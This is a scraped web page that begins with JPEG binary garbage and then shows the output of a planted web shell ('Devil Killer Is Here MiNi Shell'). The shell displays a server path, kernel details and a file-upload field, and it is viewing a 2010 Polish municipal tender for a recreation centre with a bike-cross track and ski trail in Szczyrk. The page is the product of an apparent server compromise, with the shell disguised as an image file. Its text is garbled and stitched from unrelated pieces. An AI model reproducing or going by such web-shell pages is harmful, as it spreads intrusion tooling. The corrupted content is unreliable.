JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100412/102140-N-2010.html

<p class="kh_header"><b>Szczyrk: Budowa Centrum Rekreacji (crossowy tor rowerowy i trasa narciarstwa biegowego) w Mieście Szczyrk</b><br>
<b>Numer ogłoszenia: 102140 - 2010; data zamieszczenia: 12.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Szczyrku , ul. Beskidzka 4, 43-370 Szczyrk, woj. śląskie, tel. 033 8295026, faks 033 8178763.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.szczyrk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa Centrum Rekreacji (crossowy tor rowerowy i trasa narciarstwa biegowego) w Mieście Szczyrk.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa Centrum Rekreacji (crossowy tor rowerowy i trasa narciarstwa biegowego) w Mieście Szczyrk.
Zagospodarowanie terenu  stanowi pętlę ścieżki narciarskiej służącej latem jako trasa rowerowa (po uprzednim przystosowaniu profilu poprzecznego i regulaminu). Trasę (przebiegi), nachylenia i rozwiązania szczegółowe zrealizowano w oparciu o wymagania Zamawiającego.
W ramach projektowanego zagospodarowania przewidziano układ dróg wewnętrznych z płyt ażurowych, plac manewrowy, ściany oporowe stabilizujące grunt (wg części konstrukcyjnej), ogrodzenie częściowe, odwodnienie terenu, ujecie wody do celów naśnieżania (bez pompowni -studnia).
1. CZEŚĆ KONSTRUKCYJNA  
1.1. SCIANKI OPOROWE (PALISADA)
W celu zabezpieczenia odcinków trasy biegowej przewidziano wykonanie ścianek oporowych (palisady) metodą pali wierconych z odciągami. Przyjęto wykonanie palisady grupowej, w postaci rzędów pali o długości 3,9 m. Pomiędzy grupami należy pozostawić szczelinę o szerokości 10,0 cm na przepływ wody gruntowej. Pale będą wiercone w większości w wietrzelinie i skale. Przewidziano pale o średnicy 30 cm. Zbrojenie pali w postaci 6 prętów śr. 18 po obwodzie. Beton klasy B30, stal gatunku 14HNMBCu. Część powyżej gruntu należy wykonać jako beton monolityczny przedłużając zbrojenie pali do góry. W górnej części palisady przewidziano belkę oczepową pracującą na zginanie poziome o przekroju 40 x 30 cm. W belce przewidziano zamocowanie cięgien o średnicy śr.48 ze stali gat. 14HNMBCu. Przewidziano cięgna długości 10,0 m, w rozstawie co około 2,0 m, wprowadzone w grunt po katem około 150. Każde cięgno zakończone jest buławą o długości około 4,0 m, mocowana w zwietrzelinie skalnej. Ścianki oporowe z pali wierconych wykonać z poziomu terenu przed niwelacja. Przed wykonaniem ścianki oporowej należy wywiercić  i zainfekować kotwy ścianki o nośności min. 314kN. Kotwy rozmieścić zgodnie z rysunkiem. Po związaniu iniektu należy wykonać próbę nośności na wyrywanie zgodnie z norma PN-83/B-02482. Długość ściany i długość słupów określono w oparciu o niwelacje terenu. Jej dokładna wysokość i długość należy ustalić po wykonaniu makroniwelacji i wytyczeniu trasy w uzgodnieniu z geotechnikiem i konstruktorem. 
1.2. SCIANA OPOROWA KATOWA PRZY DRODZE
W celu zabezpieczenia drogi przewidziano żelbetowa. Płytę fundamentowa skierowano w stronę stoku. Wysokość napierającego gruntu od poziomu terenu wynosi około 2,5 m. Grubość ściany i grubość płyty dolnej wynosi 0,35 m. Grubość ściany w górnej części. Beton klasy
B25, stal klasy A - IIIN. Wodoszczelność W8, mrozoodporność F150. 
1.3. WARUNKI GRUNTOWE
Stwierdzono, że starsze podłoże budują utwory kredy. Jest to tzw, flisz karpacki, reprezentowany przez warstwy godulskie, wykształcone jako kompleks łupkowo - piaskowcowy. Zbocze zbudowane jest z materiału grubo okruchowego wypełnionego materiałem gliniastym. Materiał ten podlegał transportowi po zboczu. wg. opinii geotechnicznej obecnie zbocze jest stabilne. Podłoże budują następujące warstwy:
- Warstwa Ia - glina pylasta lub piaszczysta twardoplastyczna IL = 0,20 o miąższości około 0,70m.
- Warstwa Ib - koluwialne rumosze kamieniste z partiami o większym zaślinieniu, Grunty te są   luźne na pograniczu średniozagęszczonych glina pylasta lub piaszczysta twardoplastyczna ID = 0,30 o kilkumetrowej miąższości.
- Warstwa II - skała twarda - piaskowiec przewarstwiony cienkimi laminami łupka ilastego.
Na podstawie Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dn. 24 września 1998 r., (Dz. U. z dnia 8 października 1998 r.) obiekty zaliczono do pierwszej kategorii geotechnicznej. Podłoże dobrze dogęścić ciężką  płytą wibracyjną.
1.4. WZMACNIANIE SKARP
Wszystkie skarpy o nachyleniu od 30÷600 należy zabezpieczyć antyerozyjnie geokratą o średniej komórce i wysokości 0,1 m, wypełnionej humusem. Parametry geokraty nie powinny być gorsze od kraty TABOSS mGT. W miejscach wypływu wody ze skarpy należy wykonać drenaż  wgłębny zgodnie z częścią wod-kan. Zasypkę ścianki oporowej wykonać gruntem rodzimym, stabilizowanym 5% dodatkiem cementu zagęszczając go przy wilgotności optymalnej do IS 0,97. Skarpy, które powstaną w wyniku niwelacji obiektu należy zabezpieczyć przed erozja i lokalnymi zjazdami geokratą jak wyżej. 
Ponieważ nachylenie projektowanych skarp jest mniejsze od 45°, a grunt je tworzący znajduje się w stanie co najmniej twardoplastycznym, można uznać, że wykonanie wzmocnień za pomocą geokraty w części zabezpieczy ich stabilność. Niemniej jednak ze względu na warunki lokalne istnieje potrzeba wykonania ścianek oporowych. Palisade należy wykonać tak, aby nie zakłócić przepływu wody gruntowej - nie powodować jej spiętrzenia co mogłoby zdestabilizować cały stok. W celu zabezpieczenia odcinków trasy biegowej przewidziano wykonanie ścianek oporowych (palisady) metoda pali wierconych z odciągami j.w. Szczegółowy projekt techniczny posadowienia pali objęty osobnym opracowaniem wykonanym przez firmę wykonawcza. Wynika to z tego, że pewne decyzje mogą zostać podjęto dopiero w trakcie wykonywania prac, w szczególności po wykonaniu wstępnej niwelacji i oceny sytuacji przez uprawnionego geotechnika. W trakcie robót może dojść do rezygnacji z części ścianek z pali. Wszelkie prace ziemne musza być wykonane pod ścisłym nadzorem uprawnionego geotechnika. Ze względu na warunki lokalne należy liczyć się z koniecznością modyfikacji fragmentów ścianek oporowych i miejsc zabezpieczonych teokrata w trakcie wykonywanych prac budowlanych.
2. CZĘŚĆ DROGOWA - TRASY 
- niezbędne prace przygotowawcze,
- rozbiórkę istniejących nawierzchni,
- wykonanie nowych konstrukcji dróg dojazdowych,
- wykonanie prac ziemnych związanych z budowa tras biegowych,
- wykonanie prac wykończeniowych.
Głównym elementem projektowanego zagospodarowania Centrum Rekreacyjnego będzie trasa biegowa. Długość trasy będzie wynosiła1800 m, jej przebieg jest dopasowany do naturalnego ukształtowania terenu. Pochylenia niwelet zaprojektowano tak aby jak najbardziej dopasować się do naturalnych spadków. Nie mniej jednak zakres robót ziemnych będzie dość znaczny ze względu na fakt ukształtowania odpowiedniego przekroju poprzecznego trasy. Ze względu na szerokość trasy (8 m) było konieczne zastosowanie murów oporowych.
Ponadto od obsługi Centrum zaprojektowano drogi dojazdowe. Nawierzchnie będzie wykonana z płyt ażurowych. Szerokość drogi będzie wynosić 5 m z poboczem gruntowym o szerokości 1 m. Spadek w przekroju poprzecznym będzie jednostronny o pochyleniu 2%.  (Należy również wyremontować odcinek drogi ulicy Sosnowej. Remont polegać będzie na frezowaniu istniejącej nawierzchni o grubości 4cm. Następnie należy wykonać nakładkę z warstwy wyrównawczej grubości 6cm i warstwę ścieralną grubości 4cm. - wyłączone z zakresu  zamówienia) 
2.1.  KONSTRUKCJA  NAWIERZCHNI JEZDNI 
Konstrukcje jezdni drogi dojazdowej zaprojektowano jako typowa i przyjęto niezbędne grubości warstw konstrukcyjnych (wg. Dz. U. Nr 43 z 1999r. poz. 430) jak dla ruchu kategorii KR1 oraz warunków wodno - gruntowych G2 :
Drogi dojazdowe
- 7 cm płyty ażurowe
- 3 cm podsypka cem. - piask. 1:4
- 20 cm podbudowa zasadnicza z kruszywa łamanego 0/31.5 mm
- 15 cm warstwa odsączająca z piasku
2.2. ODWODNIENIE 
Na projektowanym odcinku przewiduje się następujące elementy odwodnienia: korytka ściekowe .
2.3. ODTWORZENIE (WYZNACZENIE) TRASY I PUNKTÓW WYSOKOŚCIOWYCH
Roboty mające na celu odtworzenie i wyznaczenie tras i punktów wysokościowych oraz obsługę geodezyjna robót.
Zakres robót obejmuje:
a) wytyczenie w oparciu o dane projektowe i istniejący przebieg tras, ich punktów głównych tj. początków i końców elementów geometrycznych - łuków kołowych z ich zastabilizowaniem sytuacyjnym i wysokościowym,
b) wytyczenie w oparciu o dane projektowe i istniejące elementy terenowe projektowanych urządzeń z ich zastabilizowaniem sytuacyjnym i wysokościowym,
c) zabezpieczenie wyznaczonych punktów i reperów w celu ich odtworzenia,
d) wykonanie pomiarów powykonawczych i aktualizacja zasobu mapowego we właściwym ośrodku geodezyjnym.
Roboty obejmują zdjęcie warstwy humusu pod projektowana infrastrukturę drogową .
Przewiduje się mechaniczne i ręczne zdjęcie warstwy ziemi urodzajnej (średnio 10 cm) na głębokość jego zalegania, na powierzchni wyznaczonych przez granice robót ziemnych.
Przewiduje się zgromadzenie części objętości humusu na składowisku przyobiektowym w odległości 1 km w celu późniejszego wykorzystania. Pozostała objętość należy odwieźć na wysypisko w odległości 10km. Wykonanie wykopów i nasypów dla poszerzenia i podniesienia korony drogi oraz tras .
3. KONSTRUKCJA PLACU I DROGI DOJAZDOWEJ I TRAS BIEGOWYCH
3.1. KORYTO WRAZ Z PROFILOWANIEM I ZAGĘSZCZENIEM PODŁOŻA
Wykonanie koryta polega na profilowaniu dna koryta do wymaganego profilu umożliwiającego spływ wód gruntowych i przenikających opadowych do projektowanego drenażu oraz zagęszczenie zgodnie z projektem. Bezpośrednio po profilowaniu podłoża należy przystąpić do jego dogęszczania przez wałowanie. Wilgotność gruntu podłoża przy zagęszczeniu nie powinna różnic się od wilgotności optymalnej o więcej niż 20% jej wartości. Wartości wskaźnika zagęszczenia (Is) nie powinny być mniejsze od wartości 1,0.
3.2.  WARSTWA ODSĄCZAJĄCA Z PIASKU
Warstwa odsączająca z kruszywa powinna być wykonana z piasku spełniającej następujące warunki:
a) wskaźnik piaskowy WP  35,
b) wartość współczynnika wodoprzepuszczalności k powinna być większą od 8 m/dobę,
c) wskaźnik różnoziarnistości U  5,
d) umożliwiać uzyskanie wskaźnika zagęszczenia Is warstwy odsączającej równego 1,03 według normalnej próby Proctora (PN-88/B-04481, metoda I lub II) badanego zgodnie z norma BN-77/8931-12,
e) nie powinno zawierać zanieczyszczeń:
- obcych - zawartość nie więcej niż 0,3% badanie według PN-77/B-06714/12.
- organicznych - barwa cieczy nie ciemniejsza od wzorcowej badanie według PN-EN 1744-1.
f) powinna spełniać warunek szczelności określony wzorem:

   D15       5
   d 85
w którym:
D15 - wymiar boku oczka sita, przez które przechodzi 15% ziaren warstwy odsączającej [mm],
d85 - wymiar boku oczka sita, przez które przechodzi 85% ziaren warstwy odsączającej [mm].
Kruszywo do wykonania warstwy odsączającej powinno być rozkładane w warstwie o zmiennej grubości przy użyciu  równiarki. Natychmiast po końcowym wyprofilowaniu warstwy odsączającej należy przystąpić do jej zagęszczania przez wałowanie.

Warstwa podbudowy z kruszywa łamanego gr.20cm i 0/31.5mm, odziarnienie tras biegowych
Warstwę podbudowy układa się na całej powierzchni projektowanej infrastruktury drogowej. Roboty obejmują wykonanie warstwy z kruszywa betonowego, stabilizowanego mechanicznie, łącznej grubości 25 cm układanej w jednej warstwie, na zagęszczonej warstwie odsączającej. Przed zagęszczeniem rozścielane kruszywo wyprofilować do spadków poprzecznych i pochyleń  podłużnych wymaganych w dokumentacji. Warstwę zagęszcza się walcami stalowymi wibracyjnymi gładkimi. W przypadku niedoboru materiału należy użyć kruszywa łamanego o uziarnieniu 0/63 mm.
Ponadto podbudowa zlokalizowana bezpośrednio na gruncie podłoża powinna spełniać wymóg nieprzenikania cząstek:

   D15      5
   d 85
w którym
D15 - wymiar sita, przez które przechodzi 15% ziaren warstwy podbudowy,
d85 - wymiar sita, przez które przechodzi 85% ziaren gruntu  podłoża.
3.3.  Warstwa wierzchnia z płyt ażurowych 58x58x7
Płyty układa się na całej powierzchni projektowanej infrastruktury drogowej. Roboty obejmują wykonanie warstwy podsypki cementowo piaskowej (stosunek 1:4) gr. 4 cm a następnie układanie płyt ażurowych grub. 7 cm na drogach dojazdowych. Szczeliny miedzy kostkami nie mogą wynosić więcej jak 2 do 3 mm. Kostkę należy układać ok. 1,5 cm wyżej od projektowanej niwelety nawierzchni, gdyż w czasie wibrowania (ubijania) podsypka ulega zagęszczeniu. 
4. SIECI  ZEWNĘTRZNE 
- kanalizacji deszczowej z wylotem do rzeki;
- przygotowanie studnie pod zabudowę pompowni;
- drenaż skarp oraz murów oporowych;
4.1. UZBROJENIE LINIOWE -  KANALIZACJA DESZCZOWA I DRENAŻ MURÓW OPOROWYCH
Nowo budowana kanalizacja deszczowa będzie odbierała wody deszczowe z drenażu odwadniającego mury oporowe oraz koryt odwadniających skarpy. Przewody kanalizacji deszczowej zaprojektowano z rur PVC-U Dz400-160. Na projektowanych ciągach będą wykonane studzienki rewizyjno-połączeniowe z kręgów betonowych o średnicy Dn1200 oraz studzienki inspekcyjne z tworzywa sztucznego o średnicach Dn600- Dn300.
Odwodnienie powierzchni stadionu dolnego będzie realizowane systemem drenarskim z rur z polipropylenu Dz200-160. Przed odprowadzaniem ścieków do odbiornika ścieki będą podczyszczone w osadniku zawiesiny mineralnej OZM 21 prod.np. Ecologic. 
4.2. WODOCIĄG 
Doprowadzenie wody na potrzeby naśnieżania do projektowanej pompowni Dn3000 będzie wykonane przewodem Dz250 PE100 SDR11. W ramach realizowanego zadania projektowego nie przewidywana jest zabudowa pomp wraz z osprzętem w projektowanej studni Dn3000.
Lokalizacja przewodów oraz urządzeń wg części rysunkowej.
5. INSTALACJE ELEKTRYCZNE 
- zasilanie;
- zewnętrzne sieci elektryczne;
- ochronę od porażeń prądem elektrycznym.
5.1. ZASILANIE 
Zgodnie z warunkami przyłączenia nr WP/R4/416061/09 z dnia 05.03.2009 wydanymi przez ENION S.A. Rejon Dystrybucji Żywiec, obiekt zasilany będzie ze stacji transformatorowej Szczyrk Wodociągi [40123] z transformatorem o mocy 250kVA. Zasilanie zostanie zrealizowane kablem ziemnym YAKXS (lub YAKY) 2x4x120, który zostanie doprowadzony do złącza kablowego z częścią pomiaru rozliczeniowego energii w układzie półpośrednim, zlokalizowanego w granicy działki 5871/1. Złącze kablowe będzie zintegrowane z układem pomiarowo-rozliczeniowym energii elektrycznej. Zamówiona i gwarantowana w warunkach przyłączenia moc elektryczna to 160kW. Wybudowanie złącza kablowego z układem pomiarowym leży po stronie dostawcy energii. Miejscem dostarczania energii elektrycznej będą zaciski prądowe na wyjściu przewodów od zabezpieczeń w złączu, granicą własności będą zaciski pierwotne na wyjściu przewodów od przekładników prądowych w kierunku instalacji Inwestora (za układem pomiarowo-rozliczeniowym w złączu kablowym).
Przy złączu kablowym należącym do ENION S.A. projektuje się zabudowę złącza kablowego
Inwestora (oznaczone na planie jako ZKG), które umożliwi realizację podłączenia wewnętrznej linii zasilającej od miejsca przyłączenia. Z projektowanego złącza kablowego Inwestora zostanie wyprowadzona linia wlz typu 3x YAKY 4x240, która będzie doprowadzona do złącza rozdzielczego pokazanego na planie sieci i oznaczonego jako ZKR1. Dane znamionowe układu zasilania są następujące:
- napięcie: 3 x 230/400 V;
- częstotliwość: 50 Hz;
- układ sieciowy: TT;
- współczynnik mocy jako tg  0,4.
5.2. SIECI ELEKTRYCZNE 
Szczegółowy zakres projektu obejmuje jedynie budowę wewnętrznej linii zasilającej typu 3x YAKY 4x240 od złącza kablowego z częścią pomiaru rozliczeniowego energii do złącza kablowego oznaczonego jako ZKR1, zlokalizowanego przy budynku (kontenerze) przyszłej pompowni. Trasy projektowanych sieci elektrycznych zostały przedstawione na planie zewnętrznych sieci elektrycznych. W załączeniu zostały przedstawione szczegółowe obliczenia doboru linii kablowych głównego zasilania (wlz-ty). Sprawdzone zostały również warunki skuteczności samoczynnego wyłączenia zasilania w przypadku zwarć w liniach zasilających. Dla realizowanych sieci i instalacji sumaryczny względny spadek napięcia od szyn rozdzielnicy głównej stacji transformatorowej nie może przekroczyć wartości 7%, a w przypadku rozruchu silników elektrycznych 15%. Stąd dobrano przekroje kabli zasilających zgodnie z wynikami obliczeń podanymi w załączniku.
Linia kablowa wewnętrznej linii zasilającej typu 3x YAKY 4x240 zostanie ułożona od złącza kablowego oznaczonego jako ZKG (usytuowanego w granicy działki 5871/1) w kierunku projektowanego ujęcia wody dla potrzeb armatek śnieżnych z pompownią główną. Przy pompowni zostanie zabudowane pierwsze kablowe złącze rozgałęźne oznaczone jako ZKR1. Kable elektrycznych sieci zewnętrznych będą prowadzone w ziemi. Na trasie projektowanej linii kablowej nie występują przejazdy, stąd nie trzeba kabli chronić rurami ochronnymi zabezpieczającymi kablami przed uszkodzeniami mechanicznymi. Kable należy układać na głębokości 0,7m.
Wszystkie roboty kablowe należy wykonywać zgodnie z normą nr N SEP-E-004. Elektroenergetyczne i sygnalizacyjne linie kablowe. Projektowanie i budowa.
5.3. OCHRONA OD PORAŻEŃ PRĄDEM ELEKTRYCZNYM 
Instalacje i sieci elektryczne stacji pracować będą w układzie TT. Wzdłuż układanych kabli wlz
należy układać bednarkę ocynkowaną FeZn 30x4, do której należy podłączać szyny PE złączy kablowych. Wszystkie urządzenia elektryczne powinny spełniać warunki ochrony podstawowej od porażeń prądem elektrycznym. Jako dodatkową ochronę od porażeń zastosowano szybkie wyłączenie zasilania, które winno być zapewnione w czasie maksymalnym 0,4 sekundy.
Szybkie wyłączenie w układzie TT, dla projektowanej linii kablowej objętej projektem, będzie
zrealizowane za pośrednictwem wkładek topikowych bezpieczników.
Dla potrzeb ochrony przeciwprzepięciowej w głównym złączu kablowym ZKG zostaną zabudowane ochronniki przeciwprzepięciowe klasy B a w złączach rozdzielczych i rozdzielnicy budynku gospodarczego ochronniki klasy C.
6. WYKONANIE  GEODEZYJNEJ DOKUMENTACJI POWYKONAWCZEJ .
7. Pokrycie ewentualnych kosztów odbiorów robót, inspektorów działających z ramienia  gestorów sieci podlegających przebudowie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.20.00.00-9, 45.11.00.00-1, 45.23.00.00-8, 45.34.00.00-6, 45.26.00.00-7, 45.23.13.00-8, 45.31.42.00-3, 45.31.56.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona wadium w wysokości : 41.997,83 zł (słownie: czterdzieści jeden tysięcy  dziewięćset  dziewięćdziesiąt siedem złotych  83/100) 
2. Wadium należy wnieść w terminie do dnia 04.05.2010r. do godz. 10:00 w formach określonych w art. 45 ust. 6 ustawy Prawo zamówień publicznych.
Wadium wniesione w pieniądzu należy wpłacić przelewem na rachunek Zamawiającego: 
Bank Spółdzielczy w Radziechowach-Wieprzu konto: 58 8140 0009 0043 8656 2000 0030 z dopiskiem wadium na : Budowa Centrum Rekreacji (crossowy tor rowerowy i trasa narciarstwa biegowego) w Mieście Szczyrk 
3. Za skuteczne wniesienie wadium w pieniądzu Zamawiający uważa wadium, które w oznaczonym terminie znajduje się na koncie Zamawiającego.
4. Potwierdzeniem wniesienia wadium w pieniądzu będzie kserokopia przelewu (wpłaty) załączona do oferty.
5. Wadium w pozostałych formach należy składać w kasie Urzędu Miejskiego w Szczyrku, ul. Beskidzka 4, pokój nr 24 w terminie przed upływem składania ofert
6. Zamawiający zwraca wadium na zasadach określonych w art. 46  Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>według oświadczenia art. 22 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia  - w okresie ostatnich 5 latach przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej jedną robotę budowlaną  odpowiadającą rodzajem i wartością robotom stanowiącym przedmiot zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia tj.  
Potencjał techniczny, w tym minimum :
- 2  koparki jednołyżkowe napędzaną na wszystkie osie lub na podwoziu gąsienicowym o  
  pojemności łyżki do 0,25-0,60m3 ;                                      
- 1  spycharkę gąsienicową;            
- 1  ładowarkę;                                 
- 2  samochody samowyładowawcze o pojemności do 5 -10 t;   
- 2  pompy spalinowymi;            
- 1  walec statyczny samojezdny 10 t;
- 1  walec wibracyjny 7,5 t ;
- 3 ubijarki spalinowe- płyta ;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania osobami zdolnymi do wykonania zamówienia -  pracownikami posiadającymi kwalifikacje zawodowe i doświadczenie niezbędne do wykonania zamówienia, tj.: kierownicy robót muszą posiadać 5 letnie doświadczenie zawodowe liczone od momentu uzyskania uprawnień na stanowisku kierownika robót oraz uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń zgodnie z wymogami ustawy Prawo budowlane z dnia 7 lipca 1994 r (tj. Dz. U. z 2006 r, Nr 156, poz. 1118 z późn. zm.) lub odpowiadającymi im uprawnieniami nadanymi na podstawie wcześniej obowiązujących przepisów w specjalnościach:
a.konstrukcyjno - budowlanej bez ograniczeń,
b.drogowej,
c.instalacyjnej w zakresie sieci, instalacji urządzeń elektrycznych i elektroenergetycznych,
d.instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,  wodociągowych  i kanalizacyjnych,</p>
